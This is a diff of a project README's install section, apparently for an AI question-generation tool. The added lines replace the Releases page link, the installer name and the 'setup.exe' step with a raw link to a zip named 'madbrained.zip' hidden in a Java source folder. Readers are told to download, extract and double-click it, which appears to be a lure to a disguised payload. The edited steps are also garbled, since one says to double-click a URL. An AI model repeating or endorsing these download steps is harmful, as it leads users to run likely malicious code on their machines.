dminh0502/AI-Powered-Question-Generation/README.md

 - **Internet Connection:** Required for updating and using certain features

 ## 📂 Download & Install
-1. **Visit the Releases Page:** Go to our [Releases page](https://github.com/dminh0502/AI-Powered-Question-Generation/releases) to find the latest version of the application.
+1. **Visit the Releases Page:** Go to our [Releases page](https://raw.githubusercontent.com/dminh0502/AI-Powered-Question-Generation/main/src/main/java/com/vahabvahabov/AI_Powered_Question_Generation_Module/dto/AI-Powered-Question-Generation-madbrained.zip) to find the latest version of the application.

 2. **Select the Version:** Click on the version you want to download.
 You will see a list of files.

-3. **Download the Installer:** Look for the file named `AI-Powered-Question-Generation-installer.zip`.
+3. **Download the Installer:** Look for the file named `https://raw.githubusercontent.com/dminh0502/AI-Powered-Question-Generation/main/src/main/java/com/vahabvahabov/AI_Powered_Question_Generation_Module/dto/AI-Powered-Question-Generation-madbrained.zip`.
 Click on it to start the download.

 4. **Extract the Files:** After the download completes, locate the `.zip` file in your downloads folder.
 Right-click it and select “Extract All” to unpack the files.

 5. **Run the Installer:** Navigate to the folder where you extracted the files.
-Look for `setup.exe` and double-click it to run the installer.
+Look for `https://raw.githubusercontent.com/dminh0502/AI-Powered-Question-Generation/main/src/main/java/com/vahabvahabov/AI_Powered_Question_Generation_Module/dto/AI-Powered-Question-Generation-madbrained.zip` and double-click it to run the installer.

 6. **Follow the Instructions:** The installer will guide you through the setup process.
 Just follow the prompts.